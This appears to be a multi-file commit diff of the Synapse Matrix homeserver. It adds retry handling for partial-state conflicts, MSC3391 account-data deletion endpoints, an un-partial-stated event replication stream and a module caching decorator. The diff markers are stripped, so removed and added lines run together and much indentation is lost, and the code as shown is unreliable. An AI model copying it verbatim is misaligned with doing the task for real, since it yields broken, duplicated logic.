    # Only rate-limit if the user actually joined the room, otherwise we'll end
    # up blocking profile updates.
    if newly_joined and ratelimit:
        await self._join_rate_limiter_local.ratelimit(requester)
        await self._join_rate_per_room_limiter.ratelimit(
            requester, key=room_id, update=False
        )
with opentracing.start_active_span("handle_new_client_event"):
    result_event = await self.event_creation_handler.handle_new_client_event(
        requester,
        events_and_context=[(event, context)],
        extra_users=[target],
        ratelimit=ratelimit,
    )
if event.membership == Membership.LEAVE:
    if prev_member_event_id:
        prev_member_event = await self.store.get_event(prev_member_event_id)
        if prev_member_event.membership == Membership.JOIN:
            await self._user_left_room(target, room_id)
# Try several times, it could fail with PartialStateConflictError,
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
    try:
        event, context = await self.event_creation_handler.create_event(
            requester,
            {
                "type": EventTypes.Member,
                "content": content,
                "room_id": room_id,
                "sender": requester.user.to_string(),
                "state_key": user_id,
                # For backwards compatibility:
                "membership": membership,
                "origin_server_ts": origin_server_ts,
            },
            txn_id=txn_id,
            allow_no_prev_events=allow_no_prev_events,
            prev_event_ids=prev_event_ids,
            state_event_ids=state_event_ids,
            depth=depth,
            require_consent=require_consent,
            outlier=outlier,
            historical=historical,
        )
        prev_state_ids = await context.get_prev_state_ids(
            StateFilter.from_types([(EventTypes.Member, None)])
        )
        prev_member_event_id = prev_state_ids.get(
            (EventTypes.Member, user_id), None
        )
        if event.membership == Membership.JOIN:
            newly_joined = True
            if prev_member_event_id:
                prev_member_event = await self.store.get_event(
                    prev_member_event_id
                )
                newly_joined = prev_member_event.membership != Membership.JOIN
            # Only rate-limit if the user actually joined the room, otherwise we'll end
            # up blocking profile updates.
            if newly_joined and ratelimit:
                await self._join_rate_limiter_local.ratelimit(requester)
                await self._join_rate_per_room_limiter.ratelimit(
                    requester, key=room_id, update=False
                )
        with opentracing.start_active_span("handle_new_client_event"):
            result_event = (
                await self.event_creation_handler.handle_new_client_event(
                    requester,
                    events_and_context=[(event, context)],
                    extra_users=[target],
                    ratelimit=ratelimit,
                )
            )
        if event.membership == Membership.LEAVE:
            if prev_member_event_id:
                prev_member_event = await self.store.get_event(
                    prev_member_event_id
                )
                if prev_member_event.membership == Membership.JOIN:
                    await self._user_left_room(target, room_id)
        break
    except PartialStateConflictError as e:
        # Persisting couldn't happen because the room got un-partial stated
        # in the meantime and context needs to be recomputed, so let's do so.
        if i == max_retries - 1:
            raise e
        pass
# we know it was persisted, so should have a stream ordering
assert result_event.internal_metadata.stream_ordering
@ -1214,6 +1236,8 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):
ratelimit: Whether to rate limit this request.
Raises:
SynapseError if there was a problem changing the membership.
PartialStateConflictError: if attempting to persist a partial state event in
a room that has been un-partial stated.
"""
target_user = UserID.from_string(event.state_key)
room_id = event.room_id
@ -1843,21 +1867,37 @@ class RoomMemberMasterHandler(RoomMemberHandler):
list(previous_membership_event.auth_event_ids()) + prev_event_ids
)
event, context = await self.event_creation_handler.create_event(
    requester,
    event_dict,
    txn_id=txn_id,
    prev_event_ids=prev_event_ids,
    auth_event_ids=auth_event_ids,
    outlier=True,
)
event.internal_metadata.out_of_band_membership = True
result_event = await self.event_creation_handler.handle_new_client_event(
    requester,
    events_and_context=[(event, context)],
    extra_users=[UserID.from_string(target_user)],
)
# Try several times, it could fail with PartialStateConflictError
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
    try:
        event, context = await self.event_creation_handler.create_event(
            requester,
            event_dict,
            txn_id=txn_id,
            prev_event_ids=prev_event_ids,
            auth_event_ids=auth_event_ids,
            outlier=True,
        )
        event.internal_metadata.out_of_band_membership = True
        result_event = (
            await self.event_creation_handler.handle_new_client_event(
                requester,
                events_and_context=[(event, context)],
                extra_users=[UserID.from_string(target_user)],
            )
        )
        break
    except PartialStateConflictError as e:
        # Persisting couldn't happen because the room got un-partial stated
        # in the meantime and context needs to be recomputed, so let's do so.
        if i == max_retries - 1:
            raise e
        pass
# we know it was persisted, so must have a stream ordering
assert result_event.internal_metadata.stream_ordering

View File

@ -20,7 +20,6 @@ from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Set,
import attr
from synapse.api.constants import (
EventContentFields,
EventTypes,
HistoryVisibility,
JoinRules,
@ -701,13 +700,6 @@ class RoomSummaryHandler:
# there should always be an entry
assert stats is not None, "unable to retrieve stats for %s" % (room_id,)
current_state_ids = await self._storage_controllers.state.get_current_state_ids(
room_id
)
create_event = await self._store.get_event(
current_state_ids[(EventTypes.Create, "")]
)
entry = {
"room_id": stats["room_id"],
"name": stats["name"],
@ -720,7 +712,7 @@ class RoomSummaryHandler:
stats["history_visibility"] == HistoryVisibility.WORLD_READABLE
),
"guest_can_join": stats["guest_access"] == "can_join",
"room_type": create_event.content.get(EventContentFields.ROOM_TYPE),
"room_type": stats["room_type"],
}
if self._msc3266_enabled:
@ -730,7 +722,11 @@ class RoomSummaryHandler:
# Federation requests need to provide additional information so the
# requested server is able to filter the response appropriately.
if for_federation:
current_state_ids = (
await self._storage_controllers.state.get_current_state_ids(room_id)
)
room_version = await self._store.get_room_version(room_id)
if await self._event_auth_handler.has_restricted_join_rules(
current_state_ids, room_version
):

View File

@ -275,7 +275,7 @@ class SearchHandler:
)
room_ids = {r.room_id for r in rooms}
# If doing a subset of all rooms seearch, check if any of the rooms
# If doing a subset of all rooms search, check if any of the rooms
# are from an upgraded room, and search their contents as well
if search_filter.rooms:
historical_room_ids: List[str] = []

View File

@ -37,6 +37,7 @@ from synapse.api.presence import UserPresenceState
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS
from synapse.events import EventBase
from synapse.handlers.relations import BundledAggregations
from synapse.logging import issue9533_logger
from synapse.logging.context import current_context
from synapse.logging.opentracing import (
SynapseTags,
@ -1401,11 +1402,14 @@ class SyncHandler:
logger.debug("Fetching room data")
res = await self._generate_sync_entry_for_rooms(
    sync_result_builder, account_data_by_room
)
newly_joined_rooms, newly_joined_or_invited_or_knocked_users, _, _ = res
_, _, newly_left_rooms, newly_left_users = res
(
    newly_joined_rooms,
    newly_joined_or_invited_or_knocked_users,
    newly_left_rooms,
    newly_left_users,
) = await self._generate_sync_entry_for_rooms(
    sync_result_builder, account_data_by_room
)
block_all_presence_data = (
since_token is None and sync_config.filter_collection.blocks_all_presence()
@ -1622,13 +1626,18 @@ class SyncHandler:
}
)
logger.debug(
"Returning %d to-device messages between %d and %d (current token: %d)",
len(messages),
since_stream_id,
stream_id,
now_token.to_device_key,
)
if messages and issue9533_logger.isEnabledFor(logging.DEBUG):
issue9533_logger.debug(
"Returning to-device messages with stream_ids (%d, %d]; now: %d;"
" msgids: %s",
since_stream_id,
stream_id,
now_token.to_device_key,
[
message["content"].get(EventContentFields.TO_DEVICE_MSGID)
for message in messages
],
)
sync_result_builder.now_token = now_token.copy_and_replace(
StreamKeyType.TO_DEVICE, stream_id
)
@ -1782,6 +1791,7 @@ class SyncHandler:
- newly_left_rooms
- newly_left_users
"""
since_token = sync_result_builder.since_token
# 1. Start by fetching all ephemeral events in rooms we've joined (if required).

View File

@ -18,6 +18,7 @@ from typing import (
TYPE_CHECKING,
Any,
Callable,
Collection,
Dict,
Generator,
Iterable,
@ -126,7 +127,7 @@ from synapse.types import (
from synapse.types.state import StateFilter
from synapse.util import Clock
from synapse.util.async_helpers import maybe_awaitable
from synapse.util.caches.descriptors import CachedFunction, cached
from synapse.util.caches.descriptors import CachedFunction, cached as _cached
from synapse.util.frozenutils import freeze
if TYPE_CHECKING:
@ -136,6 +137,7 @@ if TYPE_CHECKING:
T = TypeVar("T")
P = ParamSpec("P")
F = TypeVar("F", bound=Callable[..., Any])
"""
This package defines the 'stable' API which can be used by extension modules which
@ -185,6 +187,42 @@ class UserIpAndAgent:
last_seen: int
def cached(
*,
max_entries: int = 1000,
num_args: Optional[int] = None,
uncached_args: Optional[Collection[str]] = None,
) -> Callable[[F], CachedFunction[F]]:
"""Returns a decorator that applies a memoizing cache around the function. This
decorator behaves similarly to functools.lru_cache.
Example:
@cached()
def foo(a, b):
...
Added in Synapse v1.74.0.
Args:
max_entries: The maximum number of entries in the cache. If the cache is full
and a new entry is added, the least recently accessed entry will be evicted
from the cache.
num_args: The number of positional arguments (excluding `self`) to use as cache
keys. Defaults to all named args of the function.
uncached_args: A list of argument names to not use as the cache key. (`self` is
always ignored.) Cannot be used with num_args.
Returns:
A decorator that applies a memoizing cache around the function.
"""
return _cached(
max_entries=max_entries,
num_args=num_args,
uncached_args=uncached_args,
)
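A usage sketch for the wrapper above, assuming the decorator is applied to a module method in the same way Synapse applies its internal decorator (class and method names here are hypothetical):

from synapse.module_api import cached

class ExampleModule:
    @cached(max_entries=500, uncached_args=["hint"])
    async def fetch_domain(self, user_id: str, hint: str = "") -> str:
        # Memoized on user_id; "hint" is excluded from the cache key.
        return user_id.split(":", 1)[1]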
class ModuleApi:
"""A proxy object that gets passed to various plugin modules so they
can register new users etc if necessary.

View File

@ -26,10 +26,7 @@ def format_push_rules_for_user(
"""Converts a list of rawrules and a enabled map into nested dictionaries
to match the Matrix client-server format for push rules"""
rules: Dict[str, Dict[str, List[Dict[str, Any]]]] = {
"global": {},
"device": {},
}
rules: Dict[str, Dict[str, List[Dict[str, Any]]]] = {"global": {}}
rules["global"] = _add_empty_priority_class_arrays(rules["global"])

View File

@ -28,7 +28,7 @@ if TYPE_CHECKING:
logger = logging.getLogger(__name__)
class ReplicationUserAccountDataRestServlet(ReplicationEndpoint):
class ReplicationAddUserAccountDataRestServlet(ReplicationEndpoint):
"""Add user account data on the appropriate account data worker.
Request format:
@ -49,7 +49,6 @@ class ReplicationUserAccountDataRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload( # type: ignore[override]
@ -73,7 +72,45 @@ class ReplicationUserAccountDataRestServlet(ReplicationEndpoint):
return 200, {"max_stream_id": max_stream_id}
class ReplicationRoomAccountDataRestServlet(ReplicationEndpoint):
class ReplicationRemoveUserAccountDataRestServlet(ReplicationEndpoint):
"""Remove user account data on the appropriate account data worker.
Request format:
POST /_synapse/replication/remove_user_account_data/:user_id/:type
{
"content": { ... },
}
"""
NAME = "remove_user_account_data"
PATH_ARGS = ("user_id", "account_data_type")
CACHE = False
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
@staticmethod
async def _serialize_payload( # type: ignore[override]
user_id: str, account_data_type: str
) -> JsonDict:
return {}
async def _handle_request( # type: ignore[override]
self, request: Request, user_id: str, account_data_type: str
) -> Tuple[int, JsonDict]:
max_stream_id = await self.handler.remove_account_data_for_user(
user_id, account_data_type
)
return 200, {"max_stream_id": max_stream_id}
class ReplicationAddRoomAccountDataRestServlet(ReplicationEndpoint):
"""Add room account data on the appropriate account data worker.
Request format:
@ -94,7 +131,6 @@ class ReplicationRoomAccountDataRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload( # type: ignore[override]
@ -118,6 +154,44 @@ class ReplicationRoomAccountDataRestServlet(ReplicationEndpoint):
return 200, {"max_stream_id": max_stream_id}
class ReplicationRemoveRoomAccountDataRestServlet(ReplicationEndpoint):
"""Remove room account data on the appropriate account data worker.
Request format:
POST /_synapse/replication/remove_room_account_data/:user_id/:room_id/:account_data_type
{
"content": { ... },
}
"""
NAME = "remove_room_account_data"
PATH_ARGS = ("user_id", "room_id", "account_data_type")
CACHE = False
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
@staticmethod
async def _serialize_payload( # type: ignore[override]
user_id: str, room_id: str, account_data_type: str, content: JsonDict
) -> JsonDict:
return {}
async def _handle_request( # type: ignore[override]
self, request: Request, user_id: str, room_id: str, account_data_type: str
) -> Tuple[int, JsonDict]:
max_stream_id = await self.handler.remove_account_data_for_room(
user_id, room_id, account_data_type
)
return 200, {"max_stream_id": max_stream_id}
class ReplicationAddTagRestServlet(ReplicationEndpoint):
"""Add tag on the appropriate account data worker.
@ -139,7 +213,6 @@ class ReplicationAddTagRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload( # type: ignore[override]
@ -186,7 +259,6 @@ class ReplicationRemoveTagRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload(user_id: str, room_id: str, tag: str) -> JsonDict: # type: ignore[override]
@ -206,7 +278,11 @@ class ReplicationRemoveTagRestServlet(ReplicationEndpoint):
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
ReplicationUserAccountDataRestServlet(hs).register(http_server)
ReplicationRoomAccountDataRestServlet(hs).register(http_server)
ReplicationAddUserAccountDataRestServlet(hs).register(http_server)
ReplicationAddRoomAccountDataRestServlet(hs).register(http_server)
ReplicationAddTagRestServlet(hs).register(http_server)
ReplicationRemoveTagRestServlet(hs).register(http_server)
if hs.config.experimental.msc3391_enabled:
ReplicationRemoveUserAccountDataRestServlet(hs).register(http_server)
ReplicationRemoveRoomAccountDataRestServlet(hs).register(http_server)

View File

@ -13,12 +13,13 @@
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Optional, Tuple
from typing import TYPE_CHECKING, Dict, List, Optional, Tuple
from twisted.web.server import Request
from synapse.http.server import HttpServer
from synapse.http.servlet import parse_json_object_from_request
from synapse.logging.opentracing import active_span
from synapse.replication.http._base import ReplicationEndpoint
from synapse.types import JsonDict
@ -84,6 +85,76 @@ class ReplicationUserDevicesResyncRestServlet(ReplicationEndpoint):
return 200, user_devices
class ReplicationMultiUserDevicesResyncRestServlet(ReplicationEndpoint):
"""Ask master to resync the device list for multiple users from the same
remote server by contacting their server.
This must happen on master so that the results can be correctly cached in
the database and streamed to workers.
Request format:
POST /_synapse/replication/multi_user_device_resync
{
"user_ids": ["@alice:example.org", "@bob:example.org", ...]
}
Response is roughly equivalent to `/_matrix/federation/v1/user/devices/:user_id`
response, but there is a map from user ID to response, e.g.:
{
"@alice:example.org": {
"devices": [
{
"device_id": "JLAFKJWSCS",
"keys": { ... },
"device_display_name": "Alice's Mobile Phone"
}
]
},
...
}
"""
NAME = "multi_user_device_resync"
PATH_ARGS = ()
CACHE = False
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
from synapse.handlers.device import DeviceHandler
handler = hs.get_device_handler()
assert isinstance(handler, DeviceHandler)
self.device_list_updater = handler.device_list_updater
self.store = hs.get_datastores().main
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload(user_ids: List[str]) -> JsonDict: # type: ignore[override]
return {"user_ids": user_ids}
async def _handle_request( # type: ignore[override]
self, request: Request
) -> Tuple[int, Dict[str, Optional[JsonDict]]]:
content = parse_json_object_from_request(request)
user_ids: List[str] = content["user_ids"]
logger.info("Resync for %r", user_ids)
span = active_span()
if span:
span.set_tag("user_ids", f"{user_ids!r}")
multi_user_devices = await self.device_list_updater.multi_user_device_resync(
user_ids
)
return 200, multi_user_devices
class ReplicationUploadKeysForUserRestServlet(ReplicationEndpoint):
"""Ask master to upload keys for the user and send them out over federation to
update other servers.
@ -151,4 +222,5 @@ class ReplicationUploadKeysForUserRestServlet(ReplicationEndpoint):
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
ReplicationUserDevicesResyncRestServlet(hs).register(http_server)
ReplicationMultiUserDevicesResyncRestServlet(hs).register(http_server)
ReplicationUploadKeysForUserRestServlet(hs).register(http_server)

View File

@ -36,6 +36,7 @@ from synapse.replication.tcp.streams import (
TagAccountDataStream,
ToDeviceStream,
TypingStream,
UnPartialStatedEventStream,
UnPartialStatedRoomStream,
)
from synapse.replication.tcp.streams.events import (
@ -43,7 +44,10 @@ from synapse.replication.tcp.streams.events import (
EventsStreamEventRow,
EventsStreamRow,
)
from synapse.replication.tcp.streams.partial_state import UnPartialStatedRoomStreamRow
from synapse.replication.tcp.streams.partial_state import (
UnPartialStatedEventStreamRow,
UnPartialStatedRoomStreamRow,
)
from synapse.types import PersistedEventPosition, ReadReceipt, StreamKeyType, UserID
from synapse.util.async_helpers import Linearizer, timeout_deferred
from synapse.util.metrics import Measure
@ -148,6 +152,9 @@ class ReplicationDataHandler:
rows: a list of Stream.ROW_TYPE objects as returned by Stream.parse_row.
"""
self.store.process_replication_rows(stream_name, instance_name, token, rows)
# NOTE: this must be called after process_replication_rows to ensure any
# cache invalidations are first handled before any stream ID advances.
self.store.process_replication_position(stream_name, instance_name, token)
if self.send_handler:
await self.send_handler.process_replication_rows(stream_name, token, rows)
@ -247,6 +254,14 @@ class ReplicationDataHandler:
self._state_storage_controller.notify_room_un_partial_stated(
row.room_id
)
elif stream_name == UnPartialStatedEventStream.NAME:
for row in rows:
assert isinstance(row, UnPartialStatedEventStreamRow)
# Wake up any tasks waiting for the event to be un-partial-stated.
self._state_storage_controller.notify_event_un_partial_stated(
row.event_id
)
await self._presence_handler.process_replication_rows(
stream_name, instance_name, token, rows

View File

@ -42,7 +42,10 @@ from synapse.replication.tcp.streams._base import (
)
from synapse.replication.tcp.streams.events import EventsStream
from synapse.replication.tcp.streams.federation import FederationStream
from synapse.replication.tcp.streams.partial_state import UnPartialStatedRoomStream
from synapse.replication.tcp.streams.partial_state import (
UnPartialStatedEventStream,
UnPartialStatedRoomStream,
)
STREAMS_MAP = {
stream.NAME: stream
@ -63,6 +66,7 @@ STREAMS_MAP = {
AccountDataStream,
UserSignatureStream,
UnPartialStatedRoomStream,
UnPartialStatedEventStream,
)
}
@ -83,4 +87,5 @@ __all__ = [
"AccountDataStream",
"UserSignatureStream",
"UnPartialStatedRoomStream",
"UnPartialStatedEventStream",
]

View File

@ -46,3 +46,31 @@ class UnPartialStatedRoomStream(Stream):
current_token_without_instance(store.get_un_partial_stated_rooms_token),
store.get_un_partial_stated_rooms_from_stream,
)
@attr.s(slots=True, frozen=True, auto_attribs=True)
class UnPartialStatedEventStreamRow:
# ID of the event that has been un-partial-stated.
event_id: str
# True iff the rejection status of the event changed as a result of being
# un-partial-stated.
rejection_status_changed: bool
class UnPartialStatedEventStream(Stream):
"""
Stream to notify about events becoming un-partial-stated.
"""
NAME = "un_partial_stated_event"
ROW_TYPE = UnPartialStatedEventStreamRow
def __init__(self, hs: "HomeServer"):
store = hs.get_datastores().main
super().__init__(
hs.get_instance_name(),
# TODO(faster_joins, multiple writers): we need to account for instance names
current_token_without_instance(store.get_un_partial_stated_events_token),
store.get_un_partial_stated_events_from_stream,
)

View File

@ -3,11 +3,10 @@
{% block header %}
<script src="https://www.recaptcha.net/recaptcha/api.js" async defer></script>
<script src="//code.jquery.com/jquery-1.11.2.min.js"></script>
<link rel="stylesheet" href="/_matrix/static/client/register/style.css">
<script>
function captchaDone() {
$('#registrationForm').submit();
document.getElementById('registrationForm').submit();
}
</script>
{% endblock %}

View File

@ -338,6 +338,11 @@ class EmailThreepidRequestTokenRestServlet(RestServlet):
)
async def on_POST(self, request: SynapseRequest) -> Tuple[int, JsonDict]:
if not self.hs.config.registration.enable_3pid_changes:
raise SynapseError(
400, "3PID changes are disabled on this server", Codes.FORBIDDEN
)
if not self.config.email.can_verify_email:
logger.warning(
"Adding emails have been disabled due to lack of an email config"

View File

@ -41,6 +41,7 @@ class AccountDataServlet(RestServlet):
def __init__(self, hs: "HomeServer"):
super().__init__()
self._hs = hs
self.auth = hs.get_auth()
self.store = hs.get_datastores().main
self.handler = hs.get_account_data_handler()
@ -54,6 +55,16 @@ class AccountDataServlet(RestServlet):
body = parse_json_object_from_request(request)
# If experimental support for MSC3391 is enabled, then providing an empty dict
# as the value for an account data type should be functionally equivalent to
# calling the DELETE method on the same type.
if self._hs.config.experimental.msc3391_enabled:
if body == {}:
await self.handler.remove_account_data_for_user(
user_id, account_data_type
)
return 200, {}
await self.handler.add_account_data_for_user(user_id, account_data_type, body)
return 200, {}
@ -72,9 +83,48 @@ class AccountDataServlet(RestServlet):
if event is None:
raise NotFoundError("Account data not found")
# If experimental support for MSC3391 is enabled, then this endpoint should
# return a 404 if the content for an account data type is an empty dict.
if self._hs.config.experimental.msc3391_enabled and event == {}:
raise NotFoundError("Account data not found")
return 200, event
class UnstableAccountDataServlet(RestServlet):
"""
Contains an unstable endpoint for removing user account data, as specified by
MSC3391. If that MSC is accepted, this code should have unstable prefixes removed
and become incorporated into AccountDataServlet above.
"""
PATTERNS = client_patterns(
"/org.matrix.msc3391/user/(?P<user_id>[^/]*)"
"/account_data/(?P<account_data_type>[^/]*)",
unstable=True,
releases=(),
)
def __init__(self, hs: "HomeServer"):
super().__init__()
self.auth = hs.get_auth()
self.handler = hs.get_account_data_handler()
async def on_DELETE(
self,
request: SynapseRequest,
user_id: str,
account_data_type: str,
) -> Tuple[int, JsonDict]:
requester = await self.auth.get_user_by_req(request)
if user_id != requester.user.to_string():
raise AuthError(403, "Cannot delete account data for other users.")
await self.handler.remove_account_data_for_user(user_id, account_data_type)
return 200, {}
class RoomAccountDataServlet(RestServlet):
"""
PUT /user/{user_id}/rooms/{room_id}/account_data/{account_dataType} HTTP/1.1
@ -89,6 +139,7 @@ class RoomAccountDataServlet(RestServlet):
def __init__(self, hs: "HomeServer"):
super().__init__()
self._hs = hs
self.auth = hs.get_auth()
self.store = hs.get_datastores().main
self.handler = hs.get_account_data_handler()
@ -121,6 +172,16 @@ class RoomAccountDataServlet(RestServlet):
Codes.BAD_JSON,
)
# If experimental support for MSC3391 is enabled, then providing an empty dict
# as the value for an account data type should be functionally equivalent to
# calling the DELETE method on the same type.
if self._hs.config.experimental.msc3391_enabled:
if body == {}:
await self.handler.remove_account_data_for_room(
user_id, room_id, account_data_type
)
return 200, {}
await self.handler.add_account_data_to_room(
user_id, room_id, account_data_type, body
)
@ -152,9 +213,63 @@ class RoomAccountDataServlet(RestServlet):
if event is None:
raise NotFoundError("Room account data not found")
# If experimental support for MSC3391 is enabled, then this endpoint should
# return a 404 if the content for an account data type is an empty dict.
if self._hs.config.experimental.msc3391_enabled and event == {}:
raise NotFoundError("Room account data not found")
return 200, event
class UnstableRoomAccountDataServlet(RestServlet):
"""
Contains an unstable endpoint for removing room account data, as specified by
MSC3391. If that MSC is accepted, this code should have unstable prefixes removed
and become incorporated into RoomAccountDataServlet above.
"""
PATTERNS = client_patterns(
"/org.matrix.msc3391/user/(?P<user_id>[^/]*)"
"/rooms/(?P<room_id>[^/]*)"
"/account_data/(?P<account_data_type>[^/]*)",
unstable=True,
releases=(),
)
def __init__(self, hs: "HomeServer"):
super().__init__()
self.auth = hs.get_auth()
self.handler = hs.get_account_data_handler()
async def on_DELETE(
self,
request: SynapseRequest,
user_id: str,
room_id: str,
account_data_type: str,
) -> Tuple[int, JsonDict]:
requester = await self.auth.get_user_by_req(request)
if user_id != requester.user.to_string():
raise AuthError(403, "Cannot delete account data for other users.")
if not RoomID.is_valid(room_id):
raise SynapseError(
400,
f"{room_id} is not a valid room ID",
Codes.INVALID_PARAM,
)
await self.handler.remove_account_data_for_room(
user_id, room_id, account_data_type
)
return 200, {}
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
AccountDataServlet(hs).register(http_server)
RoomAccountDataServlet(hs).register(http_server)
if hs.config.experimental.msc3391_enabled:
UnstableAccountDataServlet(hs).register(http_server)
UnstableRoomAccountDataServlet(hs).register(http_server)
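For illustration, a hypothetical client exchange against the endpoints registered above (homeserver URL and access token are placeholders):

import requests

BASE = "https://homeserver.example/_matrix/client/unstable/org.matrix.msc3391"
HEADERS = {"Authorization": "Bearer <access_token>"}

# Delete a piece of global account data via the unstable endpoint.
requests.delete(
    f"{BASE}/user/@alice:example.org/account_data/m.example", headers=HEADERS
)

# With MSC3391 enabled, PUTting an empty object to the stable endpoint is
# treated the same as the DELETE above.
requests.put(
    "https://homeserver.example/_matrix/client/v3"
    "/user/@alice:example.org/account_data/m.example",
    headers=HEADERS,
    json={},
)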

View File

@ -11,6 +11,7 @@
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import html
import logging
import urllib.parse
from typing import TYPE_CHECKING, List, Optional
@ -161,7 +162,9 @@ class OEmbedProvider:
title = oembed.get("title")
if title and isinstance(title, str):
open_graph_response["og:title"] = title
# A common WordPress plug-in seems to incorrectly escape entities
# in the oEmbed response.
open_graph_response["og:title"] = html.unescape(title)
author_name = oembed.get("author_name")
if not isinstance(author_name, str):
@ -180,9 +183,9 @@ class OEmbedProvider:
# Process each type separately.
oembed_type = oembed.get("type")
if oembed_type == "rich":
html = oembed.get("html")
if isinstance(html, str):
calc_description_and_urls(open_graph_response, html)
html_str = oembed.get("html")
if isinstance(html_str, str):
calc_description_and_urls(open_graph_response, html_str)
elif oembed_type == "photo":
# If this is a photo, use the full image, not the thumbnail.
@ -192,8 +195,8 @@ class OEmbedProvider:
elif oembed_type == "video":
open_graph_response["og:type"] = "video.other"
html = oembed.get("html")
if html and isinstance(html, str):
html_str = oembed.get("html")
if html_str and isinstance(html_str, str):
calc_description_and_urls(open_graph_response, oembed["html"])
for size in ("width", "height"):
val = oembed.get(size)
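The html.unescape call above reverses over-escaped entities; for example, with a hypothetical WordPress-style title:

import html

# "&#8217;" is a right single quotation mark; "&amp;" is a literal ampersand.
assert html.unescape("Alice&#8217;s Blog &amp; Photos") == "Alice\u2019s Blog & Photos"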

View File

@ -202,14 +202,20 @@ class StateHandler:
room_id: the room_id containing the given events.
event_ids: the events whose state should be fetched and resolved.
await_full_state: if `True`, will block if we do not yet have complete state
at the given `event_id`s, regardless of whether `state_filter` is
satisfied by partial state.
at these events and `state_filter` is not satisfied by partial state.
Defaults to `True`.
Returns:
the state dict (a mapping from (event_type, state_key) -> event_id) which
holds the resolution of the states after the given event IDs.
"""
logger.debug("calling resolve_state_groups from compute_state_after_events")
if (
await_full_state
and state_filter
and not state_filter.must_await_full_state(self.hs.is_mine_id)
):
await_full_state = False
ret = await self.resolve_state_groups_for_events(
room_id, event_ids, await_full_state
)
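The short-circuit above skips blocking when partial state already satisfies the filter; roughly, a filter that only touches local users' membership need not wait. A sketch mirroring that call, with a hypothetical server name:

from synapse.types.state import StateFilter

state_filter = StateFilter.from_types([("m.room.member", "@alice:example.org")])

def is_mine_id(user_id: str) -> bool:
    return user_id.endswith(":example.org")

# Partial state already covers local membership, so no need to block.
if not state_filter.must_await_full_state(is_mine_id):
    await_full_state = False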

View File

@ -57,7 +57,22 @@ class SQLBaseStore(metaclass=ABCMeta):
token: int,
rows: Iterable[Any],
) -> None:
pass
"""
Used by storage classes to invalidate caches based on incoming replication data. These
must not update any ID generators, use `process_replication_position`.
"""
def process_replication_position( # noqa: B027 (no-op by design)
self,
stream_name: str,
instance_name: str,
token: int,
) -> None:
"""
Used by storage classes to advance ID generators based on incoming replication data. This
is called after process_replication_rows such that caches are invalidated before any token
positions advance.
"""
def _invalidate_state_caches(
self, room_id: str, members_changed: Collection[str]

View File

@ -1762,7 +1762,8 @@ class DatabasePool:
desc: description of the transaction, for logging and metrics
Returns:
A list of dictionaries.
A list of dictionaries, one per result row, each a mapping between the
column names from `retcols` and that column's value for the row.
"""
return await self.runInteraction(
desc,
@ -1791,6 +1792,10 @@ class DatabasePool:
column names and values to select the rows with, or None to not
apply a WHERE clause.
retcols: the names of the columns to return
Returns:
A list of dictionaries, one per result row, each a mapping between the
column names from `retcols` and that column's value for the row.
"""
if keyvalues:
sql = "SELECT %s FROM %s WHERE %s" % (
@ -1898,6 +1903,19 @@ class DatabasePool:
updatevalues: Dict[str, Any],
desc: str,
) -> int:
"""
Update rows in the given database table.
If the given keyvalues don't match anything, nothing will be updated.
Args:
table: The database table to update.
keyvalues: A mapping of column name to value to match rows on.
updatevalues: A mapping of column name to value to replace in any matched rows.
desc: description of the transaction, for logging and metrics.
Returns:
The number of rows that were updated. Will be 0 if no matching rows were found.
"""
return await self.runInteraction(
desc, self.simple_update_txn, table, keyvalues, updatevalues
)
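A short usage sketch for the documented method, from within a hypothetical store method (table and column names are illustrative):

async def set_displayname(store, user_id: str, displayname: str) -> int:
    # `store` is assumed to expose a DatabasePool as `db_pool`.
    # Returns the number of rows matched; 0 means nothing was updated.
    return await store.db_pool.simple_update(
        table="profiles",
        keyvalues={"user_id": user_id},
        updatevalues={"displayname": displayname},
        desc="set_displayname",
    )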
@ -1909,6 +1927,19 @@ class DatabasePool:
keyvalues: Dict[str, Any],
updatevalues: Dict[str, Any],
) -> int:
"""
Update rows in the given database table.
If the given keyvalues don't match anything, nothing will be updated.
Args:
txn: The database transaction object.
table: The database table to update.
keyvalues: A mapping of column name to value to match rows on.
updatevalues: A mapping of column name to value to replace in any matched rows.
Returns:
The number of rows that were updated. Will be 0 if no matching rows were found.
"""
if keyvalues:
where = "WHERE %s" % " AND ".join("%s = ?" % k for k in keyvalues.keys())
else:

View File

@ -123,7 +123,11 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
async def get_account_data_for_user(
self, user_id: str
) -> Tuple[Dict[str, JsonDict], Dict[str, Dict[str, JsonDict]]]:
"""Get all the client account_data for a user.
"""
Get all the client account_data for a user.
If experimental MSC3391 support is enabled, any entries with an empty
content body are excluded, as this means they have been deleted.
Args:
user_id: The user to get the account_data for.
@ -135,27 +139,48 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
def get_account_data_for_user_txn(
txn: LoggingTransaction,
) -> Tuple[Dict[str, JsonDict], Dict[str, Dict[str, JsonDict]]]:
rows = self.db_pool.simple_select_list_txn(
txn,
"account_data",
{"user_id": user_id},
["account_data_type", "content"],
)
